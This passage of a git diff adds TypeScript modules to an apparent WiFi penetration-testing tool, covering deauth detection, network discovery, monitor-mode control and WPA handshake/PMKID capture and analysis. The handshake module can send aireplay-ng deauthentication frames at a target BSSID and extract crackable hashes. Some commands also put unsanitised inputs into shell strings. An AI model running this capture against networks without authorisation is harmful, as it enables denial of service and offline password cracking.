+          references: [],
+          evidence: `${count} deauth frames, targeting ${sourceAttacks.length} unique MAC(s)`,
+          falsePositive: false,
+          verified: true,
+          detectedAt: Date.now(),
+        })
+      }
+    }
+
+    return findings
+  }
+
+  function getDeauthDescription(analysis: DeauthAnalysis, totalCount: number): string {
+    const parts: string[] = []
+
+    parts.push(`A deauthentication attack was detected affecting ${analysis.targetedNetworks.length} network(s).`)
+    parts.push(`${totalCount} deauthentication frames were captured from ${analysis.uniqueSources} source(s).`)
+
+    if (analysis.isBroadcast) {
+      parts.push("The attack includes broadcast deauthentication frames, which affect all clients on the network.")
+    }
+
+    if (analysis.isTargeted) {
+      parts.push(`${analysis.uniqueTargets} specific client(s) were targeted.`)
+    }
+
+    parts.push("This attack can cause denial of service and may be used to facilitate handshake capture for password cracking.")
+
+    return parts.join(" ")
+  }
+
+  function getDeauthRecommendation(analysis: DeauthAnalysis): string {
+    const parts: string[] = []
+
+    parts.push("Enable Protected Management Frames (802.11w/PMF) on all access points to prevent deauthentication attacks.")
+
+    if (analysis.severity === "critical" || analysis.severity === "high") {
+      parts.push("Consider temporarily switching to a different channel or enabling automatic channel selection.")
+      parts.push("Deploy a Wireless Intrusion Prevention System (WIPS) to automatically contain attackers.")
+    }
+
+    parts.push("Monitor for suspicious devices in the area and investigate any unknown MAC addresses sending deauth frames.")
+
+    return parts.join(" ")
+  }
+
+  // ========== Reason Code Mapping ==========
+
+  /**
+   * IEEE 802.11 deauth reason codes.
+   */
+  export const REASON_CODES: Record<number, string> = {
+    0: "Reserved",
+    1: "Unspecified reason",
+    2: "Previous authentication no longer valid",
+    3: "Deauthenticated because sending station is leaving",
+    4: "Disassociated due to inactivity",
+    5: "Disassociated because AP is unable to handle all associated stations",
+    6: "Class 2 frame received from nonauthenticated station",
+    7: "Class 3 frame received from nonassociated station",
+    8: "Disassociated because sending station is leaving",
+    9: "Station requesting association not authenticated",
+    10: "Disassociated because power capability unacceptable",
+    11: "Disassociated because supported channels unacceptable",
+    12: "Reserved",
+    13: "Invalid information element",
+    14: "MIC failure",
+    15: "4-Way Handshake timeout",
+    16: "Group Key Handshake timeout",
+    17: "Information element in 4-Way Handshake different from Assoc/Reassoc Req/Resp",
+    18: "Invalid group cipher",
+    19: "Invalid pairwise cipher",
+    20: "Invalid AKMP",
+    21: "Unsupported RSN information element version",
+    22: "Invalid RSN information element capabilities",
+    23: "IEEE 802.1X authentication failed",
+    24: "Cipher suite rejected because of security policy",
+  }
+
+  /**
+   * Get reason code description.
+   */
+  export function getReasonDescription(code: number | undefined): string {
+    if (code === undefined) return "Unknown"
+    return REASON_CODES[code] || `Unknown (${code})`
+  }
+}
diff --git a/packages/opencode/src/pentest/wirelessscan/wifi/discovery.ts b/packages/opencode/src/pentest/wirelessscan/wifi/discovery.ts
new file mode 100644
index 00000000000..0ef495ecdaa
--- /dev/null
+++ b/packages/opencode/src/pentest/wirelessscan/wifi/discovery.ts
@@ -0,0 +1,469 @@
+/**
+ * @fileoverview WiFi Network Discovery
+ *
+ * Functions for discovering WiFi networks using various methods
+ * and tools like airodump-ng, iwlist, and nmcli.
+ *
+ * @module pentest/wirelessscan/wifi/discovery
+ */
+
+import { WirelessScanTypes } from "../types"
+import { WirelessScanStorage } from "../storage"
+import { AircrackParser } from "../parsers/aircrack"
+import { Bus } from "../../../bus"
+import { WirelessScanEvents } from "../events"
+import { Log } from "../../../util/log"
+
+const log = Log.create({ service: "wirelessscan.wifi.discovery" })
+
+/**
+ * WiFi discovery namespace.
+ */
+export namespace WiFiDiscovery {
+  // ========== Interface Detection ==========
+
+  /**
+   * Detect wireless interfaces using iw/iwconfig.
+   */
+  export async function detectInterfaces(
+    execCommand: (cmd: string) => Promise<{ stdout: string; stderr: string; exitCode: number }>
+  ): Promise<WirelessScanTypes.WirelessInterface[]> {
+    const interfaces: WirelessScanTypes.WirelessInterface[] = []
+
+    // Try iw first
+    const iwResult = await execCommand("iw dev 2>/dev/null || true")
+    if (iwResult.stdout) {
+      interfaces.push(...parseIwDev(iwResult.stdout))
+    }
+
+    // Fall back to iwconfig if iw didn't find interfaces
+    if (interfaces.length === 0) {
+      const iwconfigResult = await execCommand("iwconfig 2>/dev/null || true")
+      if (iwconfigResult.stdout) {
+        interfaces.push(...parseIwconfig(iwconfigResult.stdout))
+      }
+    }
+
+    // Get additional info for each interface
+    for (const iface of interfaces) {
+      // Check supported modes
+      const phyResult = await execCommand(`iw phy phy0 info 2>/dev/null | grep -A 10 "Supported interface modes" || true`)
+      if (phyResult.stdout) {
+        const modes = extractSupportedModes(phyResult.stdout)
+        iface.supportedModes = modes
+        iface.monitorModeSupported = modes.includes("monitor")
+      }
+
+      // Check if interface is up
+      const linkResult = await execCommand(`ip link show ${iface.name} 2>/dev/null || true`)
+      iface.up = linkResult.stdout.includes("state UP")
+    }
+
+    return interfaces
+  }
+
+  /**
+   * Parse iw dev output.
+   */
+  function parseIwDev(output: string): WirelessScanTypes.WirelessInterface[] {
+    const interfaces: WirelessScanTypes.WirelessInterface[] = []
+    const blocks = output.split(/(?=Interface\s)/)
+
+    for (const block of blocks) {
+      const nameMatch = block.match(/Interface\s+(\S+)/)
+      if (!nameMatch) continue
+
+      const macMatch = block.match(/addr\s+([0-9a-fA-F:]{17})/)
+      const typeMatch = block.match(/type\s+(\S+)/)
+      const channelMatch = block.match(/channel\s+(\d+)/)
+      const freqMatch = block.match(/(\d+)\s*MHz/)
+      const txPowerMatch = block.match(/txpower\s+([\d.]+)\s*dBm/)
+
+      const mode = typeMatch?.[1] || "managed"
+      const modeMap: Record<string, WirelessScanTypes.InterfaceMode> = {
+        managed: "managed",
+        monitor: "monitor",
+        master: "master",
+        "ad-hoc": "ad-hoc",
+        mesh: "mesh",
+      }
+
+      interfaces.push({
+        name: nameMatch[1],
+        mac: macMatch?.[1]?.toUpperCase() || "",
+        mode: modeMap[mode] || "unknown",
+        channel: channelMatch ? parseInt(channelMatch[1], 10) : undefined,
+        frequency: freqMatch ? parseInt(freqMatch[1], 10) : undefined,
+        txPower: txPowerMatch ? parseFloat(txPowerMatch[1]) : undefined,
+        supportedModes: [],
+        supportedBands: [],
+        monitorModeSupported: false,
+        injectionSupported: false,
+        up: false,
+      })
+    }
+
+    return interfaces
+  }
+
+  /**
+   * Parse iwconfig output.
+   */
+  function parseIwconfig(output: string): WirelessScanTypes.WirelessInterface[] {
+    const interfaces: WirelessScanTypes.WirelessInterface[] = []
+    const lines = output.split("\n")
+
+    let currentInterface: Partial<WirelessScanTypes.WirelessInterface> | null = null
+
+    for (const line of lines) {
+      // New interface starts at beginning of line
+      if (line.match(/^\w/) && line.includes("IEEE 802.11")) {
+        if (currentInterface?.name) {
+          interfaces.push(currentInterface as WirelessScanTypes.WirelessInterface)
+        }
+
+        const nameMatch = line.match(/^(\S+)/)
+        const modeMatch = line.match(/Mode:(\S+)/)
+
+        currentInterface = {
+          name: nameMatch?.[1] || "",
+          mac: "",
+          mode: (modeMatch?.[1]?.toLowerCase() as WirelessScanTypes.InterfaceMode) || "managed",
+          supportedModes: [],
+          supportedBands: [],
+          monitorModeSupported: false,
+          injectionSupported: false,
+          up: false,
+        }
+      } else if (currentInterface) {
+        // Parse additional fields
+        const freqMatch = line.match(/Frequency[=:](\d+\.?\d*)\s*GHz/)
+        const channelMatch = line.match(/Channel[=:](\d+)/)
+        const macMatch = line.match(/Access Point[=:]\s*([0-9A-Fa-f:]{17})/)
+        const txPowerMatch = line.match(/Tx-Power[=:](\d+)\s*dBm/)
+
+        if (freqMatch) currentInterface.frequency = parseFloat(freqMatch[1]) * 1000
+        if (channelMatch) currentInterface.channel = parseInt(channelMatch[1], 10)
+        if (macMatch && !currentInterface.mac) currentInterface.mac = macMatch[1].toUpperCase()
+        if (txPowerMatch) currentInterface.txPower = parseInt(txPowerMatch[1], 10)
+      }
+    }
+
+    if (currentInterface?.name) {
+      interfaces.push(currentInterface as WirelessScanTypes.WirelessInterface)
+    }
+
+    return interfaces
+  }
+
+  /**
+   * Extract supported modes from iw phy info output.
+   */
+  function extractSupportedModes(output: string): string[] {
+    const modes: string[] = []
+    const modePattern = /\*\s+(\S+)/g
+    let match: RegExpExecArray | null
+
+    while ((match = modePattern.exec(output)) !== null) {
+      modes.push(match[1].toLowerCase())
+    }
+
+    return modes
+  }
+
+  // ========== Monitor Mode Management ==========
+
+  /**
+   * Enable monitor mode on interface.
+   */
+  export async function enableMonitorMode(
+    interfaceName: string,
+    execCommand: (cmd: string) => Promise<{ stdout: string; stderr: string; exitCode: number }>
+  ): Promise<{ success: boolean; monitorInterface: string; error?: string }> {
+    log.info("Enabling monitor mode", { interface: interfaceName })
+
+    // Try airmon-ng first
+    const airmonResult = await execCommand(`airmon-ng start ${interfaceName} 2>&1`)
+
+    if (airmonResult.exitCode === 0) {
+      // Extract monitor interface name (usually wlan0mon or similar)
+      const monMatch = airmonResult.stdout.match(/monitor mode.*?enabled.*?(\w+mon|\w+)/i)
+      const monitorInterface = monMatch?.[1] || `${interfaceName}mon`
+
+      Bus.publish(WirelessScanEvents.MonitorModeEnabled, {
+        interface: interfaceName,
+        monitorInterface,
+      })
+
+      return { success: true, monitorInterface }
+    }
+
+    // Fall back to manual iw commands
+    const cmds = [
+      `ip link set ${interfaceName} down`,
+      `iw dev ${interfaceName} set type monitor`,
+      `ip link set ${interfaceName} up`,
+    ]
+
+    for (const cmd of cmds) {
+      const result = await execCommand(cmd)
+      if (result.exitCode !== 0) {
+        return { success: false, monitorInterface: "", error: result.stderr }
+      }
+    }
+
+    Bus.publish(WirelessScanEvents.MonitorModeEnabled, {
+      interface: interfaceName,
+      monitorInterface: interfaceName,
+    })
+
+    return { success: true, monitorInterface: interfaceName }
+  }
+
+  /**
+   * Disable monitor mode on interface.
+   */
+  export async function disableMonitorMode(
+    interfaceName: string,
+    execCommand: (cmd: string) => Promise<{ stdout: string; stderr: string; exitCode: number }>
+  ): Promise<{ success: boolean; error?: string }> {
+    log.info("Disabling monitor mode", { interface: interfaceName })
+
+    // Try airmon-ng first
+    const airmonResult = await execCommand(`airmon-ng stop ${interfaceName} 2>&1`)
+
+    if (airmonResult.exitCode === 0) {
+      Bus.publish(WirelessScanEvents.MonitorModeDisabled, {
+        interface: interfaceName.replace("mon", ""),
+      })
+      return { success: true }
+    }
+
+    // Fall back to manual iw commands
+    const originalName = interfaceName.replace("mon", "")
+    const cmds = [
+      `ip link set ${interfaceName} down`,
+      `iw dev ${interfaceName} set type managed`,
+      `ip link set ${interfaceName} up`,
+    ]
+
+    for (const cmd of cmds) {
+      const result = await execCommand(cmd)
+      if (result.exitCode !== 0) {
+        return { success: false, error: result.stderr }
+      }
+    }
+
+    Bus.publish(WirelessScanEvents.MonitorModeDisabled, { interface: originalName })
+    return { success: true }
+  }
+
+  // ========== Network Scanning ==========
+
+  /**
+   * Scan for WiFi networks using airodump-ng.
+   */
+  export async function scanWithAirodump(
+    interfaceName: string,
+    options: {
+      duration?: number
+      channels?: number[]
+      band?: "a" | "b" | "g" | "abg"
+      outputFile?: string
+    },
+    execCommand: (cmd: string) => Promise<{ stdout: string; stderr: string; exitCode: number }>
+  ): Promise<{
+    networks: WirelessScanTypes.WiFiNetwork[]
+    clients: WirelessScanTypes.WiFiClient[]
+  }> {
+    const duration = options.duration || 30
+    const outputFile = options.outputFile || `/tmp/airodump_${Date.now()}`
+
+    let cmd = `timeout ${duration} airodump-ng -w ${outputFile} --output-format csv`
+
+    if (options.channels?.length) {
+      cmd += ` -c ${options.channels.join(",")}`
+    }
+
+    if (options.band) {
+      cmd += ` --band ${options.band}`
+    }
+
+    cmd += ` ${interfaceName} 2>&1`
+
+    log.debug("Running airodump-ng", { cmd })
+
+    await execCommand(cmd)
+
+    // Read the CSV output
+    const csvResult = await execCommand(`cat ${outputFile}-01.csv 2>/dev/null || true`)
+    const result = AircrackParser.parseAirodumpCsv(csvResult.stdout)
+
+    // Emit events for discovered networks
+    for (const network of result.networks) {
+      Bus.publish(WirelessScanEvents.NetworkFound, {
+        scanId: "",
+        bssid: network.bssid,
+        essid: network.essid,
+        channel: network.channel,
+        encryption: network.encryption,
+        signal: network.signal,
+      })
+    }
+
+    // Clean up temp files
+    await execCommand(`rm -f ${outputFile}* 2>/dev/null || true`)
+
+    return result
+  }
+
+  /**
+   * Scan for WiFi networks using iwlist (passive, no monitor mode required).
+   */
+  export async function scanWithIwlist(
+    interfaceName: string,
+    execCommand: (cmd: string) => Promise<{ stdout: string; stderr: string; exitCode: number }>
+  ): Promise<WirelessScanTypes.WiFiNetwork[]> {
+    const result = await execCommand(`iwlist ${interfaceName} scan 2>&1`)
+    return parseIwlistScan(result.stdout)
+  }
+
+  /**
+   * Parse iwlist scan output.
+   */
+  function parseIwlistScan(output: string): WirelessScanTypes.WiFiNetwork[] {
+    const networks: WirelessScanTypes.WiFiNetwork[] = []
+    const cells = output.split(/Cell \d+/)
+
+    for (const cell of cells) {
+      if (!cell.trim()) continue
+
+      const addressMatch = cell.match(/Address:\s*([0-9A-Fa-f:]{17})/)
+      if (!addressMatch) continue
+
+      const essidMatch = cell.match(/ESSID:"([^"]*)"/)
+      const channelMatch = cell.match(/Channel:(\d+)/)
+      const freqMatch = cell.match(/Frequency:([\d.]+)\s*GHz/)
+      const qualityMatch = cell.match(/Quality[=:](\d+)\/(\d+)/)
+      const signalMatch = cell.match(/Signal level[=:](-?\d+)\s*dBm/)
+      const encryptionMatch = cell.match(/Encryption key:(on|off)/i)
+
+      const channel = channelMatch ? parseInt(channelMatch[1], 10) : 0
+      const encryption = determineEncryption(cell, encryptionMatch?.[1] === "on")
+
+      networks.push({
+        id: WirelessScanStorage.createNetworkId(),
+        bssid: addressMatch[1].toUpperCase(),
+        essid: essidMatch?.[1] || "<hidden>",
+        channel,
+        frequency: freqMatch ? parseFloat(freqMatch[1]) * 1000 : channelToFrequency(channel),
+        band: channel <= 14 ? "2.4ghz" : channel <= 177 ? "5ghz" : "6ghz",
+        signal: signalMatch ? parseInt(signalMatch[1], 10) : -100,
+        quality: qualityMatch
+          ? Math.round((parseInt(qualityMatch[1], 10) / parseInt(qualityMatch[2], 10)) * 100)
+          : undefined,
+        encryption: encryption.type,
+        cipher: encryption.cipher,
+        authentication: encryption.auth,
+        wps: cell.includes("WPS"),
+        wpsLocked: false,
+        hidden: !essidMatch?.[1],
+        beacons: 0,
+        dataPackets: 0,
+        clients: [],
+        firstSeen: Date.now(),
+        lastSeen: Date.now(),
+      })
+    }
+
+    return networks
+  }
+
+  /**
+   * Determine encryption from iwlist output.
+   */
+  function determineEncryption(cell: string, encrypted: boolean): {
+    type: WirelessScanTypes.WiFiEncryption
+    cipher: WirelessScanTypes.WiFiCipher
+    auth: WirelessScanTypes.WiFiAuth
+  } {
+    if (!encrypted) {
+      return { type: "open", cipher: "none", auth: "open" }
+    }
+
+    if (cell.includes("WPA3") || cell.includes("SAE")) {
+      return { type: "wpa3", cipher: "ccmp", auth: "sae" }
+    }
+    if (cell.includes("WPA2") && cell.includes("WPA ")) {
+      return { type: "wpa2/wpa3", cipher: "ccmp", auth: "psk" }
+    }
+    if (cell.includes("WPA2")) {
+      const cipher = cell.includes("TKIP") ? "tkip" : "ccmp"
+      const auth = cell.includes("802.1x") || cell.includes("EAP") ? "eap" : "psk"
+      return { type: "wpa2", cipher, auth }
+    }
+    if (cell.includes("WPA")) {
+      return { type: "wpa", cipher: "tkip", auth: "psk" }
+    }
+    if (cell.includes("WEP")) {
+      return { type: "wep", cipher: "wep", auth: "open" }
+    }
+
+    return { type: "unknown", cipher: "unknown", auth: "unknown" }
+  }
+
+  /**
+   * Convert channel to frequency.
+   */
+  function channelToFrequency(channel: number): number {
+    if (channel >= 1 && channel <= 13) return 2407 + channel * 5
+    if (channel === 14) return 2484
+    if (channel >= 36 && channel <= 177) return 5000 + channel * 5
+    return 0
+  }
+
+  // ========== Network Detection ==========
+
+  /**
+   * Detect hidden networks by analyzing probe responses.
+   */
+  export async function detectHiddenNetworks(
+    clients: WirelessScanTypes.WiFiClient[],
+    networks: WirelessScanTypes.WiFiNetwork[]
+  ): Promise<string[]> {
+    const hiddenEssids = new Set<string>()
+    const knownEssids = new Set(networks.map((n) => n.essid))
+
+    for (const client of clients) {
+      for (const probe of client.probes) {
+        if (probe && !knownEssids.has(probe)) {
+          hiddenEssids.add(probe)
+        }
+      }
+    }
+
+    return Array.from(hiddenEssids)
+  }
+
+  /**
+   * Group clients by their associated network.
+   */
+  export function groupClientsByNetwork(
+    clients: WirelessScanTypes.WiFiClient[],
+    networks: WirelessScanTypes.WiFiNetwork[]
+  ): Map<string, WirelessScanTypes.WiFiClient[]> {
+    const grouped = new Map<string, WirelessScanTypes.WiFiClient[]>()
+
+    for (const network of networks) {
+      grouped.set(network.bssid, [])
+    }
+
+    for (const client of clients) {
+      if (client.bssid && grouped.has(client.bssid)) {
+        grouped.get(client.bssid)!.push(client)
+      }
+    }
+
+    return grouped
+  }
+}
diff --git a/packages/opencode/src/pentest/wirelessscan/wifi/handshake.ts b/packages/opencode/src/pentest/wirelessscan/wifi/handshake.ts
new file mode 100644
index 00000000000..89760a4d4ed
--- /dev/null
+++ b/packages/opencode/src/pentest/wirelessscan/wifi/handshake.ts
@@ -0,0 +1,399 @@
+/**
+ * @fileoverview WiFi Handshake Analysis
+ *
+ * Analysis of WPA/WPA2 handshakes and PMKID captures.
+ *
+ * @module pentest/wirelessscan/wifi/handshake
+ */
+
+import { WirelessScanTypes } from "../types"
+import { WirelessScanStorage } from "../storage"
+import { Bus } from "../../../bus"
+import { WirelessScanEvents } from "../events"
+import { HcxToolsParser } from "../parsers/hcxtools"
+import { AircrackParser } from "../parsers/aircrack"
+
+/**
+ * Handshake analysis namespace.
+ */
+export namespace WiFiHandshake {
+  // ========== Handshake Capture ==========
+
+  /**
+   * Capture handshake result.
+   */
+  export interface CaptureResult {
+    success: boolean
+    handshakes?: WirelessScanTypes.HandshakeCapture[]
+    pcapFile?: string
+    error?: string
+  }
+
+  /**
+   * Capture WPA handshakes for a target network.
+   */
+  export async function captureHandshake(
+    bssid: string,
+    options: {
+      interface?: string
+      channel?: number
+      duration?: number
+      deauth?: boolean
+    },
+    execCommand: (cmd: string) => Promise<{ stdout: string; stderr: string; exitCode: number }>
+  ): Promise<CaptureResult> {
+    const iface = options.interface || "wlan0"
+    const duration = options.duration || 60
+    const outputFile = `/tmp/capture_${Date.now()}.cap`
+
+    try {
+      // Start capture with airodump-ng
+      const airodumpCmd = `timeout ${duration} airodump-ng -c ${options.channel || ""} --bssid ${bssid} -w ${outputFile.replace(".cap", "")} ${iface} 2>&1 || true`
+      await execCommand(airodumpCmd)
+
+      // Optionally send deauth to speed up capture
+      if (options.deauth) {
+        await execCommand(`aireplay-ng -0 4 -a ${bssid} ${iface} 2>&1 || true`)
+      }
+
+      // Analyze the capture file
+      const capFile = `${outputFile.replace(".cap", "")}-01.cap`
+      const { handshakes } = await analyzeCapture(capFile, execCommand)
+
+      return {
+        success: handshakes.length > 0,
+        handshakes,
+        pcapFile: handshakes.length > 0 ? capFile : undefined,
+        error: handshakes.length === 0 ? "No handshakes captured" : undefined,
+      }
+    } catch (error) {
+      return {
+        success: false,
+        error: error instanceof Error ? error.message : String(error),
+      }
+    }
+  }
+
+  // ========== Handshake Detection ==========
+
+  /**
+   * Analyze capture file for handshakes.
+   */
+  export async function analyzeCapture(
+    captureFile: string,
+    execCommand: (cmd: string) => Promise<{ stdout: string; stderr: string; exitCode: number }>
+  ): Promise<{
+    handshakes: WirelessScanTypes.HandshakeCapture[]
+    pmkids: HcxToolsParser.PMKIDEntry[]
+  }> {
+    const handshakes: WirelessScanTypes.HandshakeCapture[] = []
+    const pmkids: HcxToolsParser.PMKIDEntry[] = []
+
+    // Try hcxpcapngtool first (preferred for modern captures)
+    const hcxResult = await execCommand(
+      `hcxpcapngtool -o /tmp/hashes.22000 ${captureFile} 2>&1 || true`
+    )
+
+    if (hcxResult.exitCode === 0) {
+      const hashContent = await execCommand("cat /tmp/hashes.22000 2>/dev/null || true")
+      if (hashContent.stdout) {
+        const hashes = HcxToolsParser.parseHash22000(hashContent.stdout)
+        handshakes.push(...HcxToolsParser.hashesToHandshakes(hashes))
+
+        // Extract PMKIDs
+        for (const hash of hashes) {
+          if (hash.type === "PMKID" && hash.pmkid) {
+            pmkids.push({
+              pmkid: hash.pmkid,
+              macAP: hash.macAP,
+              macClient: hash.macClient,
+              essid: hash.essid,
+            })
+          }
+        }
+      }
+      await execCommand("rm -f /tmp/hashes.22000")
+    }
+
+    // Also try aircrack-ng for legacy compatibility
+    const aircrackResult = await execCommand(`aircrack-ng ${captureFile} 2>&1 || true`)
+    if (aircrackResult.stdout) {
+      const aircrackHandshakes = AircrackParser.parseAircrackOutput(aircrackResult.stdout)
+      for (const hs of aircrackHandshakes) {
+        // Avoid duplicates
+        if (!handshakes.some((h) => h.bssid === hs.bssid)) {
+          handshakes.push({
+            id: WirelessScanStorage.createNetworkId(),
+            bssid: hs.bssid,
+            essid: hs.essid,
+            type: "4-way",
+            complete: !hs.keyFound, // If key not found, handshake is there
+            capturedAt: Date.now(),
+          })
+        }
+      }
+    }
+
+    return { handshakes, pmkids }
+  }
+
+  /**
+   * Check if a capture file contains valid handshakes.
+   */
+  export async function hasValidHandshake(
+    captureFile: string,
+    bssid: string,
+    execCommand: (cmd: string) => Promise<{ stdout: string; stderr: string; exitCode: number }>
+  ): Promise<boolean> {
+    // Use aircrack-ng to verify
+    const result = await execCommand(
+      `aircrack-ng -b ${bssid} ${captureFile} 2>&1 | grep -q "1 handshake" && echo "yes" || echo "no"`
+    )
+    return result.stdout.trim() === "yes"
+  }
+
+  // ========== PMKID Analysis ==========
+
+  /**
+   * Extract PMKID from capture using hcxdumptool.
+   */
+  export async function extractPMKID(
+    captureFile: string,
+    execCommand: (cmd: string) => Promise<{ stdout: string; stderr: string; exitCode: number }>
+  ): Promise<HcxToolsParser.PMKIDEntry[]> {
+    const result = await execCommand(
+      `hcxpcapngtool -o /tmp/pmkid.22000 --pmkid-eapol-strict ${captureFile} 2>&1`
+    )
+
+    if (result.exitCode !== 0) {
+      return []
+    }
+
+    const hashContent = await execCommand("cat /tmp/pmkid.22000 2>/dev/null || true")
+    await execCommand("rm -f /tmp/pmkid.22000")
+
+    if (!hashContent.stdout) {
+      return []
+    }
+
+    const hashes = HcxToolsParser.parseHash22000(hashContent.stdout)
+    return hashes
+      .filter((h) => h.type === "PMKID" && h.pmkid)
+      .map((h) => ({
+        pmkid: h.pmkid!,
+        macAP: h.macAP,
+        macClient: h.macClient,
+        essid: h.essid,
+      }))
+  }
+
+  // ========== Handshake Quality Assessment ==========
+
+  /**
+   * Handshake quality assessment.
+   */
+  export interface HandshakeQuality {
+    handshake: WirelessScanTypes.HandshakeCapture
+    quality: "excellent" | "good" | "usable" | "poor" | "invalid"
+    issues: string[]
+    crackable: boolean
+    estimatedCrackDifficulty: "easy" | "medium" | "hard" | "very_hard"
+  }
+
+  /**
+   * Assess handshake quality.
+   */
+  export function assessHandshakeQuality(
+    handshake: WirelessScanTypes.HandshakeCapture
+  ): HandshakeQuality {
+    const issues: string[] = []
+
+    // Check completeness
+    if (!handshake.complete) {
+      issues.push("Incomplete handshake")
+    }
+
+    // Check type
+    if (handshake.type === "half") {
+      issues.push("Only half handshake captured")
+    }
+
+    if (handshake.type === "unknown") {
+      issues.push("Unknown handshake type")
+    }
+
+    // PMKID is generally easier
+    const isPMKID = handshake.type === "pmkid"
+
+    // Check for client MAC
+    if (!handshake.clientMac && handshake.type !== "pmkid") {
+      issues.push("No client MAC in handshake")
+    }
+
+    // Determine quality
+    let quality: HandshakeQuality["quality"]
+    if (issues.length === 0) {
+      quality = isPMKID ? "excellent" : "good"
+    } else if (issues.length === 1 && handshake.type === "half") {
+      quality = "usable"
+    } else if (issues.length === 1) {
+      quality = "good"
+    } else if (issues.length <= 2) {
+      quality = "usable"
+    } else {
+      quality = "poor"
+    }
+
+    // Crackable if at least usable quality
+    const crackable = quality !== "poor"
+
+    // Estimate crack difficulty (based on average password strength)
+    let estimatedCrackDifficulty: HandshakeQuality["estimatedCrackDifficulty"]
+    if (isPMKID) {
+      estimatedCrackDifficulty = "medium" // PMKID is slightly easier
+    } else if (handshake.complete) {
+      estimatedCrackDifficulty = "medium"
+    } else {
+      estimatedCrackDifficulty = "hard"
+    }
+
+    return {
+      handshake,
+      quality,
+      issues,
+      crackable,
+      estimatedCrackDifficulty,
+    }
+  }
+
+  // ========== Event Emission ==========
+
+  /**
+   * Emit handshake captured event.
+   */
+  export function emitHandshakeEvent(
+    handshake: WirelessScanTypes.HandshakeCapture,
+    scanId: string
+  ): void {
+    // Map "unknown" type to "half" for event emission (events don't support "unknown")
+    const eventType: "4-way" | "pmkid" | "half" = handshake.type === "unknown" ? "half" : handshake.type
+    Bus.publish(WirelessScanEvents.HandshakeCaptured, {
+      scanId,
+      bssid: handshake.bssid,
+      essid: handshake.essid,
+      type: eventType,
+      clientMac: handshake.clientMac,
+      filePath: handshake.filePath,
+    })
+  }
+
+  // ========== Finding Generation ==========
+
+  /**
+   * Create findings from handshake analysis.
+   */
+  export function createFindings(
+    handshakes: WirelessScanTypes.HandshakeCapture[],
+    scanId: string
+  ): WirelessScanTypes.WirelessFinding[] {
+    const findings: WirelessScanTypes.WirelessFinding[] = []
+
+    for (const handshake of handshakes) {
+      const quality = assessHandshakeQuality(handshake)
+
+      if (quality.crackable) {
+        const severity: WirelessScanTypes.Severity =
+          handshake.type === "pmkid" ? "medium" : "low"
+
+        findings.push({
+          id: WirelessScanStorage.createFindingId(),
+          scanId,
+          wirelessType: "wifi",
+          category: "vulnerability",
+          severity,
+          title: `WPA ${handshake.type.toUpperCase()} Captured`,
+          description: `A ${handshake.type} ${handshake.type === "pmkid" ? "hash" : "handshake"} was captured for network "${handshake.essid || "Unknown"}" (${handshake.bssid}). This can be used for offline password cracking attempts.`,
+          target: {
+            type: "network",
+            identifier: handshake.bssid,
+            name: handshake.essid,
+          },
+          vulnerability: handshake.type === "pmkid" ? "PMKID Attack" : "WPA Handshake Capture",
+          recommendation:
+            "Use a strong, unique passphrase of at least 20 characters with mixed case, numbers, and symbols. Consider upgrading to WPA3-SAE which is resistant to offline attacks. Regularly rotate the WiFi password.",
+          references: [
+            "https://hashcat.net/forum/thread-7717.html",
+            "https://www.wi-fi.org/news-events/newsroom/wi-fi-alliance-introduces-security-enhancements",
+          ],
+          evidence: `Quality: ${quality.quality}, Type: ${handshake.type}, Complete: ${handshake.complete}`,
+          falsePositive: false,
+          verified: true,
+          detectedAt: handshake.capturedAt,
+        })
+      }
+    }
+
+    return findings
+  }
+
+  // ========== Conversion Utilities ==========
+
+  /**
+   * Convert capture file format.
+   */
+  export async function convertCapture(
+    inputFile: string,
+    outputFormat: "pcapng" | "22000" | "hccapx",
+    outputFile: string,
+    execCommand: (cmd: string) => Promise<{ stdout: string; stderr: string; exitCode: number }>
+  ): Promise<{ success: boolean; error?: string }> {
+    let cmd: string
+
+    switch (outputFormat) {
+      case "pcapng":
+        cmd = `tcpdump -r ${inputFile} -w ${outputFile} 2>&1`
+        break
+      case "22000":
+        cmd = `hcxpcapngtool -o ${outputFile} ${inputFile} 2>&1`
+        break
+      case "hccapx":
+        cmd = `hcxpcapngtool -o ${outputFile} --hccapx ${inputFile} 2>&1`
+        break
+    }
+
+    const result = await execCommand(cmd)
+    return {
+      success: result.exitCode === 0,
+      error: result.exitCode !== 0 ? result.stderr : undefined,
+    }
+  }
+
+  // ========== Statistics ==========
+
+  /**
+   * Get handshake statistics.
+   */
+  export function getStats(handshakes: WirelessScanTypes.HandshakeCapture[]): {
+    total: number
+    complete: number
+    incomplete: number
+    pmkid: number
+    fourWay: number
+    byNetwork: Record<string, number>
+  } {
+    const byNetwork: Record<string, number> = {}
+
+    for (const hs of handshakes) {
+      byNetwork[hs.bssid] = (byNetwork[hs.bssid] || 0) + 1
+    }
+
+    return {
+      total: handshakes.length,
+      complete: handshakes.filter((h) => h.complete).length,
+      incomplete: handshakes.filter((h) => !h.complete).length,
+      pmkid: handshakes.filter((h) => h.type === "pmkid").length,
+      fourWay: handshakes.filter((h) => h.type === "4-way").length,
+      byNetwork,
+    }
+  }
+}
diff --git a/packages/opencode/src/pentest/wirelessscan/wifi/index.ts b/packages/opencode/src/pentest/wirelessscan/wifi/index.ts
new file mode 100644
index 00000000000..dd6a9c8ce8d
--- /dev/null
+++ b/packages/opencode/src/pentest/wirelessscan/wifi/index.ts
@@ -0,0 +1,14 @@
+/**
+ * @fileoverview WiFi Module
+ *
+ * Exports WiFi scanning and security analysis functions.
+ *
+ * @module pentest/wirelessscan/wifi
+ */
+
+export { WiFiDiscovery } from "./discovery"
+export { WiFiSecurity } from "./security"
+export { WiFiRogueAP } from "./rogue-ap"
+export { WiFiClients } from "./clients"
+export { WiFiHandshake } from "./handshake"
+export { WiFiDeauth } from "./deauth"
diff --git a/packages/opencode/src/pentest/wirelessscan/wifi/rogue-ap.ts b/packages/opencode/src/pentest/wirelessscan/wifi/rogue-ap.ts
new file mode 100644
index 00000000000..7793def3a9b
--- /dev/null
+++ b/packages/opencode/src/pentest/wirelessscan/wifi/rogue-ap.ts
@@ -0,0 +1,515 @@
+/**
+ * @fileoverview Rogue Access Point Detection
+ *
+ * Detection of unauthorized, evil twin, and rogue access points.
+ *
+ * @module pentest/wirelessscan/wifi/rogue-ap
+ */
+
+import { WirelessScanTypes } from "../types"
+import { WirelessScanStorage } from "../storage"
+import { Bus } from "../../../bus"
+import { WirelessScanEvents } from "../events"
+
+/**
+ * Rogue AP detection namespace.
+ */
+export namespace WiFiRogueAP {
+  // ========== Detection Methods ==========
+
+  /**
